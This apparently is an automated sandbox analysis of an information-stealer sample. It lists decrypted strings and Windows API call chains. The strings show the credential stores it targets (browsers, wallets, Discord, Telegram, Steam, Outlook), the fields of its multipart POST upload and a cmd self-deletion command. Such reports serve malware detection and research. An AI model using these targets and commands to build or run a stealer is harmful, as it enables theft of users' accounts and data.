                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: chrome
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: opera
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: firefox
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: wallets
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %08lX%04lX%lu
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ProductName
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: x32
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: x64
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DisplayName
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DisplayVersion
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Network Info:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - IP: IP?
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Country: ISO?
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: System Summary:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - HWID:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - OS:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Architecture:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - UserName:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Computer Name:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Local Time:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - UTC:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Language:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Keyboards:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Laptop:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Running Path:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - CPU:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Threads:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Cores:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - RAM:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - Display Resolution:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: - GPU:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: User Agents:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Installed Apps:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: All Users:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Current User:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Process List:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: system_info.txt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: freebl3.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: mozglue.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: msvcp140.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: nss3.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: softokn3.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: vcruntime140.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Temp\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: .exe
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: runas
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: open
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: /c start
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %DESKTOP%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %APPDATA%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %LOCALAPPDATA%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %USERPROFILE%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %DOCUMENTS%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %RECENT%
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: *.lnk
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: files
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \discord\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Local Storage\leveldb
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Telegram Desktop\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: key_datas
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: map*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: F8806DD0C461824F*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Telegram
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Tox
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: *.tox
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: *.ini
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Password
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 00000001
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 00000002
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 00000003
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 00000004
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Outlook\accounts.txt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Pidgin
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \.purple\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: accounts.xml
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: dQw4w9WgXcQ
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: token:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Software\Valve\Steam
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SteamPath
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \config\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ssfn*
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: config.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DialogConfig.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: libraryfolders.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: loginusers.vdf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Steam\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: done
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: soft
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: \Discord\tokens.txt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: https
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: POST
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: HTTP/1.1
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: hwid
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: build
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: token
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: file_name
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: file
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: message
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: screenshot.jpg
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,3_2_00404B80
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,3_2_00406000
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,3_2_00407690
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00424090
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,3_2_00409BE0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00409B80
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02489E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,3_2_02489E47
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02497260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,3_2_02497260
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02486267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,3_2_02486267
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A42F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_024A42F7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0248EFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,3_2_0248EFF7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02497047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,3_2_02497047
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024878F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,3_2_024878F7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02484DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,3_2_02484DE7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02489DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_02489DE7

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeUnpacked PE file: 0.2.ssB9bjDQPf.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeUnpacked PE file: 3.2.8DF0.tmp.exe.400000.0.unpack
                  Source: ssB9bjDQPf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49724 version: TLS 1.2
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02528C59 FindFirstFileExW,0_2_02528C59
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02491EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_02491EA7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_0249CF47
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02493F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02493F27
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0248DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0248DFD7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02481807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_02481807
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02481820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_02481820
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02491827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02491827
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0249D8A7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,3_2_0249E0B7
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02495127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02495127
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0249E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_0249E597

                  Networking

                  barindex
